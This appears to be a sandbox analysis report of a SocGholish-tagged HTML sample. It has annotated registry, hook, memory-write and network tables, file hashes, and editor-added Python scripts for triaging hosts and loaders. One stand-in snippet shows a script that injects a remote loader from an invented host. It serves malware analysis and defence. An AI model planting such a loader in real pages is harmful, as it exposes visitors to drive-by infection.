Analysis Overview
SHA256
6e4e009bfff18729f325bad98edf8f371a74ffccd89f3787a40c3baae7d98eb9
Threat Level: Known bad
The file 7bcd5b3d743b791d182b9e223b10a6fc_JaffaCakes118 is an HTML document (both detonations below hand it straight to a browser) and was classified as Known bad with the family tag SocGholish. The family tag is raised in the Windows 7 / Internet Explorer run (behavioral1) only; the Windows 10 / Edge run (behavioral2) reports generic browser heuristics and lists no network or file activity.
Malicious Activity Summary
SocGholish
Socgholish family
Browser Information Discovery
System Location Discovery: System Language Discovery
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 04:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 04:40
Reported
2024-10-29 04:42
Platform
win7-20240903-en
Max time kernel
149s
Max time network
143s
Command Line
Signatures
SocGholish
Socgholish family
System Location Discovery: System Language Discovery
The process reading the key below is IEXPLORE.EXE itself, and the NLS\Language key is consulted by the Windows locale APIs any browser calls on startup; this row alone does not show page script probing the system language.
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
Every entry in this table is under the user's HKCU\Software\Microsoft\Internet Explorer hive and is written by iexplore.exe as routine per-session housekeeping (tab recovery, new-tab page, zoom, domain suggestions, window placement). None of the settings worth alarm in a browser-based infection (proxy, security zones, start page) appears here.
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a7e3310a2b0e6e498bd88e48ec67abf6000000000200000000001066000000010000200000004703a3579b4c7aebc1e3dd30eab7e3423653f8831d0228ab79b8db15ce8ef027000000000e8000000002000020000000405b497301284eff9392ac642ffb3eb3471f10994fcb0a63184ce1301fb0373f20000000efb1d3d27fc1761e510074e5d0c516f18e3376f3def8efd2f38fb220a5d5b64b400000000ab239a6aed2b7dabd2731c7ce78951cc5dfded770909659a3ddec82c59b4cf5aaf0d2be7bd683e7300b032b5a3ccb0abc353c5679a9fcfea3ae17b803f1cb89 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "436338693" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = (binary value not preserved in this copy of the report) | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0b824e9bc29db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EA37F571-95AF-11EF-869D-46BBF83CD43C} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
Recorded against iexplore.exe with no indicator. Looking up the taskbar window is part of the browser's normal UI handling and carries no weight on its own.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Hooks are installed by both the frame and tab processes with no indicator recorded. The browser installs message hooks for its own UI, so without a hook module or target outside the IE processes these rows are background noise rather than evidence of injection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
PID 2512 is the 64-bit frame process (the tab process under Processes is launched with SCODEF:2512) and the target is the 32-bit tab process, IEXPLORE.EXE under Program Files (x86). Under IE's loosely-coupled (LCIE) model the frame writes into each tab process it creates, so these four writes are the expected frame-to-tab process start, not code injection by the page. Cross-process writes would only matter here if the writer or target were something other than these two IE processes.
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 2172 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2512 wrote to memory of 2172 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2512 wrote to memory of 2172 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2512 wrote to memory of 2172 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\7bcd5b3d743b791d182b9e223b10a6fc_JaffaCakes118.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2512 CREDAT:275457 /prefetch:2
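The sample is an .html file handed straight to the browser, so the first static question is which external hosts its markup references and which hosts its inline scripts load dynamically. The Python below is an added example by the editor, not output of the sandbox or part of this report; the embedded page is a constructed stand-in for a blog page with third-party widgets, not the analysed file, and the host loader.example.invalid in it is invented to show the dynamic-loader pattern.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed stand-in page. NOT the analysed sample; loader.example.invalid is invented.
SAMPLE_HTML = """
<html><head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans">
</head><body>
<div class="post">article text</div>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){
js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";
fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
<script>
var p=["scr","ipt"],e=document.createElement(p.join(""));
e.src="https://loader.example.invalid/u.js?"+Math.random();document.head.appendChild(e);
</script>
<iframe src="https://www.facebook.com/plugins/like.php"></iframe>
</body></html>
"""

# Markup attributes that pull in remote content.
SRC_ATTRS = {"script": "src", "iframe": "src", "img": "src",
             "link": "href", "embed": "src", "object": "data"}
# Quoted absolute or protocol-relative URL inside script text; captures the host.
URL_RE = re.compile(r"""["'](?:https?:)?//([A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)""")
# Heuristic for scripts that inject further script elements at runtime.
LOADER_RE = re.compile(r"createElement\s*\(|\.src\s*=|appendChild|insertBefore")


class ExternalRefs(HTMLParser):
    """Collects external hosts referenced by markup and the text of inline scripts."""

    def __init__(self):
        super().__init__()
        self.markup = []        # (tag, host, url) for attribute-referenced resources
        self.inline = []        # body of each non-empty inline <script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        attr = SRC_ATTRS.get(tag)
        url = attrs.get(attr) if attr else None
        if url:
            host = urlparse(url).hostname   # None for same-origin / relative URLs
            if host:
                self.markup.append((tag, host.lower(), url))
        if tag == "script":
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)
            self._in_script = False


def analyse(html):
    """Return hosts referenced by markup, hosts referenced by dynamic loaders, and the loaders."""
    p = ExternalRefs()
    p.feed(html)
    p.close()
    loaders, script_hosts = [], set()
    for body in p.inline:
        if LOADER_RE.search(body):
            hosts = {h.lower() for h in URL_RE.findall(body)}
            loaders.append({"hosts": hosts, "preview": body[:70]})
            script_hosts |= hosts
    return {
        "markup_hosts": {h for _, h, _ in p.markup},
        "script_hosts": script_hosts,
        "loaders": loaders,
        "inline_scripts": len(p.inline),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_HTML)
    print("hosts in markup:         ", sorted(result["markup_hosts"]))
    print("hosts in dynamic loaders:", sorted(result["script_hosts"]))
    for ld in result["loaders"]:
        print("  loader ->", sorted(ld["hosts"]), "|", ld["preview"])
```

Legitimate widgets (the Twitter snippet in the stand-in) use the same createElement/src pattern as injected loaders, so the pattern itself is not a verdict; the useful output is the host list, which can then be compared with what the sandbox actually contacted in the Network table for this run.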
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ajax.googleapis.com | udp |
| US | 8.8.8.8:53 | www.linkwithin.com | udp |
| US | 8.8.8.8:53 | blogmagsac.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | platform.twitter.com | udp |
| SG | 118.139.179.30:80 | www.linkwithin.com | tcp |
| SG | 118.139.179.30:80 | www.linkwithin.com | tcp |
| GB | 146.75.72.157:443 | platform.twitter.com | tcp |
| GB | 146.75.72.157:443 | platform.twitter.com | tcp |
| GB | 142.250.187.202:80 | ajax.googleapis.com | tcp |
| GB | 142.250.187.202:80 | ajax.googleapis.com | tcp |
| GB | 216.58.204.66:80 | pagead2.googlesyndication.com | tcp |
| GB | 216.58.204.66:80 | pagead2.googlesyndication.com | tcp |
| GB | 142.250.200.46:443 | apis.google.com | tcp |
| GB | 142.250.200.46:443 | apis.google.com | tcp |
| GB | 142.250.178.10:80 | fonts.googleapis.com | tcp |
| GB | 142.250.178.10:80 | fonts.googleapis.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.204.67:80 | c.pki.goog | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| GB | 142.250.180.3:80 | o.pki.goog | tcp |
| GB | 146.75.72.157:443 | platform.twitter.com | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 2.18.190.73:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | pinit-cdn.pinterest.com | udp |
| GB | 163.70.151.35:80 | www.facebook.com | tcp |
| GB | 163.70.151.35:80 | www.facebook.com | tcp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 163.70.151.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| US | 8.8.8.8:53 | ssl.gstatic.com | udp |
| GB | 142.250.200.3:443 | ssl.gstatic.com | tcp |
| GB | 142.250.200.3:443 | ssl.gstatic.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | tcp |
| GB | 142.250.200.2:443 | ep1.adtrafficquality.google | tcp |
| US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp |
| GB | 216.58.213.1:443 | ep2.adtrafficquality.google | tcp |
| GB | 216.58.213.1:443 | ep2.adtrafficquality.google | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
| NL | 173.194.69.84:443 | accounts.google.com | tcp |
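The table above mixes DNS lookups (udp to 8.8.8.8:53) with TCP connections. A quick triage is to group rows by domain and ask two questions: which domains were resolved but never connected to, and which are not well-known CDN, social, ad or PKI endpoints. The Python below is an added example by the editor, not part of the report; the rows are copied (deduplicated) from the table above, while the list of expected third-party domains is the editor's assumption.

```python
from collections import defaultdict

# Rows copied from the Network table above, repeats removed:
# country | destination | domain | proto
NETWORK_ROWS = """
US | 8.8.8.8:53 | ajax.googleapis.com | udp
US | 8.8.8.8:53 | www.linkwithin.com | udp
US | 8.8.8.8:53 | blogmagsac.com | udp
US | 8.8.8.8:53 | apis.google.com | udp
US | 8.8.8.8:53 | platform.twitter.com | udp
SG | 118.139.179.30:80 | www.linkwithin.com | tcp
GB | 146.75.72.157:443 | platform.twitter.com | tcp
GB | 142.250.187.202:80 | ajax.googleapis.com | tcp
GB | 216.58.204.66:80 | pagead2.googlesyndication.com | tcp
GB | 142.250.200.46:443 | apis.google.com | tcp
GB | 142.250.178.10:80 | fonts.googleapis.com | tcp
US | 8.8.8.8:53 | c.pki.goog | udp
GB | 216.58.204.67:80 | c.pki.goog | tcp
US | 8.8.8.8:53 | o.pki.goog | udp
GB | 142.250.180.3:80 | o.pki.goog | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.18.190.73:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.facebook.com | udp
US | 8.8.8.8:53 | pinit-cdn.pinterest.com | udp
GB | 163.70.151.35:443 | www.facebook.com | tcp
US | 8.8.8.8:53 | www.microsoft.com | udp
US | 8.8.8.8:53 | accounts.google.com | udp
NL | 173.194.69.84:443 | accounts.google.com | tcp
US | 8.8.8.8:53 | ssl.gstatic.com | udp
GB | 142.250.200.3:443 | ssl.gstatic.com | tcp
US | 204.79.197.200:443 | ieonline.microsoft.com | tcp
US | 8.8.8.8:53 | ep1.adtrafficquality.google | udp
GB | 142.250.200.2:443 | ep1.adtrafficquality.google | tcp
US | 8.8.8.8:53 | ep2.adtrafficquality.google | udp
GB | 216.58.213.1:443 | ep2.adtrafficquality.google | tcp
"""

# Domains a blog page with social/ad widgets is expected to pull in.
# Editor's assumption, not from the report; matched on label boundaries.
KNOWN_THIRD_PARTY = {
    "googleapis.com", "google.com", "gstatic.com", "googlesyndication.com",
    "adtrafficquality.google", "pki.goog",           # Google CDN, ads, OCSP/CRL
    "twitter.com", "facebook.com", "pinterest.com",  # social widgets
    "linkwithin.com",                                # related-posts widget
    "microsoft.com",                                 # OS and IE background traffic
}


def parse_rows(text):
    rows = []
    for line in text.strip().splitlines():
        country, dest, domain, proto = [f.strip() for f in line.split("|")]
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain.lower(), "proto": proto})
    return rows


def is_known(domain):
    """True if the domain or any parent domain is on the expected list."""
    parts = domain.lower().split(".")
    return any(".".join(parts[i:]) in KNOWN_THIRD_PARTY for i in range(len(parts)))


def triage(text):
    """Return (dns_only, unknown, connected).

    dns_only:  domains resolved via port 53 but never seen in a TCP connection.
    unknown:   domains not covered by KNOWN_THIRD_PARTY; the analyst's first pivot.
    connected: domain -> set of ip:port endpoints actually contacted over TCP.
    """
    dns, connected = set(), defaultdict(set)
    for r in parse_rows(text):
        if r["proto"] == "udp" and r["port"] == 53:
            dns.add(r["domain"])
        elif r["proto"] == "tcp":
            connected[r["domain"]].add(f'{r["ip"]}:{r["port"]}')
    dns_only = dns - set(connected)
    unknown = {d for d in dns | set(connected) if not is_known(d)}
    return dns_only, unknown, dict(connected)


if __name__ == "__main__":
    dns_only, unknown, connected = triage(NETWORK_ROWS)
    print("resolved but never connected:", sorted(dns_only))
    print("not on the expected list:    ", sorted(unknown))
    for d in sorted(unknown):
        print(f"  {d} -> {sorted(connected.get(d, []))}")
```

Run against the rows above, the only domain outside the expected set is blogmagsac.com, and it is also DNS-only: the sandbox resolved it but logged no TCP connection to it. That makes it the first thing to look up, but the report by itself does not say whether it is the blog's own origin or a script host, so treat the DNS-only status as a question, not a verdict.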
Files
C:\Users\Admin\AppData\Local\Temp\CabA802.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarA874.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5d06a717aeb176c073b627f4c7969697 |
| SHA1 | 49a85198a84e3bda983cb9c79c141ac90f93659c |
| SHA256 | 61de50c894e6433eae57e29948d0c6cd749778db48ba0a4391fb9cac0683e51d |
| SHA512 | 6cb1a28500b5dc411c596c1cd9b83113e60b265662391f22e9d0e49aab37fdf54f0caa02084a79c9939da207671eac896df89a5b551381adb1ce707390edd72c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 899ddbc595909ff80eca9b7e85a54e5b |
| SHA1 | 52b67d5f1c6af29ddd818795e56defd36cc1fae9 |
| SHA256 | 3463dceb09521dfab10ba9260a213ebcb0922203888c1c7ca7d75225a7f0b7a0 |
| SHA512 | 2788718321ba5f8e84fbf19bd74ba9350d6b07441be16e545b63bf76982d100dbe99239b60628825d1ee27f1a5697ced695a39e50c8e73731ed6d76b45859a5f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9beba20f77f6a924f697ba80e830f951 |
| SHA1 | 111aa1375406597c57b2614bf74ca2fcaf1bcc92 |
| SHA256 | 73dc6ce45a8855f726dd3786473bafba2144c5bde51066490feb988e1269153e |
| SHA512 | a1b82b09767acbaa4c1d2411d6201ff769df655d95a1114ca964678e3575587b6576b310e5831cba0e385796d10ea57c00abee4829286a472a9abae96156dc45 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0b79bc84023f25af2055e4927f286866 |
| SHA1 | 2b7c26d65246dc399e9610fbb50fc70aca776d85 |
| SHA256 | e3ef0846f2f7dfddceaca77bb62c66e17b25bd9efbdb43a8fb308fb9d16c33d1 |
| SHA512 | 4a4c4971fdf9b8974c7c20806971b2f4aa5047eba22147cd84761ff3535c1f755b0818fa56bf93dffaffaaeb5270491603ff8a1611d473e60b5a7335144c4ed4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6b6449400cbd47cdc63b729d1ec3b818 |
| SHA1 | bbe313e3a9cfa9169d7f8432b00c358132ab9837 |
| SHA256 | acf134bc4ec9ddf42015232da29d877da8bc66289a8d635a7d062d25a887e4f3 |
| SHA512 | 3152cf13b93fabf674968fa5946d2a022e98e8b3b9bb3671a48473c0be973a5b4a7fddec81f7d42575e6b33ee6e5562d4a3269ef3d1602253fa0ccca3466d714 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c2c12074d25f3dc487a21ad1b0ed63f5 |
| SHA1 | 92a9f4bba30268f352985fac00215fe9cfd5e58a |
| SHA256 | af5c4f120740a1f2624d4ad6c5b546f19d4e148305b408edfa34ccf0d88c9e77 |
| SHA512 | ad235bfcac613dc7914df71b677eed4567918089960abd9ee0da53cf1ca0120a5785533afca87fc28ae937a8d5a32938d5de01df76d73a21a8271b0b352ebebf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0e47a1cf00cab3695ecd3b6e5ac25f17 |
| SHA1 | 097b4c2ac6abb8acddff0dce41ddbbc0c4946cbf |
| SHA256 | 9ca2dfa3c9f312001cebdec55b30b6e5faf50aec7bfdd08a1a80e6b7e716bc11 |
| SHA512 | 9bf108b5dce89e254da98d8717922344f7b6854df81322da5b1c7f2bbcfb63d6494e673c42f1a03453abf44a2677104fd9e9ff4a668c900852259ba757615515 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3e72f0a9d26036bcc155dce2910c853a |
| SHA1 | 2c49690915712c39209d627156644c1fe9f2ba2e |
| SHA256 | 7e97214ab0e765a65050596c0eda577b9310dc26821aa3515fe4875970d23ba8 |
| SHA512 | 163a3eb7311f37cd26a6f723c42814e31fa7874ca3c062a1f77604e7643f99eb40af0f2b9401cf9b1db5f7afa70830690ec6d2d8df83de4a46acc54d13cea436 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ac75c07ad20fa8153a6794d0ddb1c356 |
| SHA1 | 0032995d67d1e746a9f2b67450f99e128492aeb0 |
| SHA256 | 0bfa932e0bbe1e97e7b03a9e31ca55a40854212cbd60a71b51471433703f7a6e |
| SHA512 | 3baa36275cf6cb6857dd393501a8e7a6ba78a344ef05b5e0ec1310940fdc61a0b530174e2c6820283b572723ea9d25d63abb52a57277e9df64c398b37955d16d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bd2981037ace2a97ae67b914376e1ed9 |
| SHA1 | affde0f20c80bf4b68abb8bff8f0d74f8ff0231d |
| SHA256 | cb674090e3322f28cb93e78604a9fe7a47a33dd7160b1a7110bd6d06219a9131 |
| SHA512 | 78ba57668e0f992e263f4ec507277ee50498d8ee02639dd6d36c55f1419670c5c2087d30bb1504b12b31f0d5f0ffc07bb6f5e955de039e98aacb99b413a78c17 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 483c06c273839fb9dbb556ab0c5d7b45 |
| SHA1 | 3d9983e8f28ab75520f41af8a1d3b518f26d28b9 |
| SHA256 | 4a0dd3f9731ca70ad7e4c09c76dea01fef1b5b307192c0cf39ccbfbe67fd72fc |
| SHA512 | 1a312529ab17b79d06e02af23ec7a3ecd3b95f01810df23d60ec05eec8f97c424ed03a0e8b744fff9f89f631fc09660ee637ffa0f10d4bf12c6125080977445c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
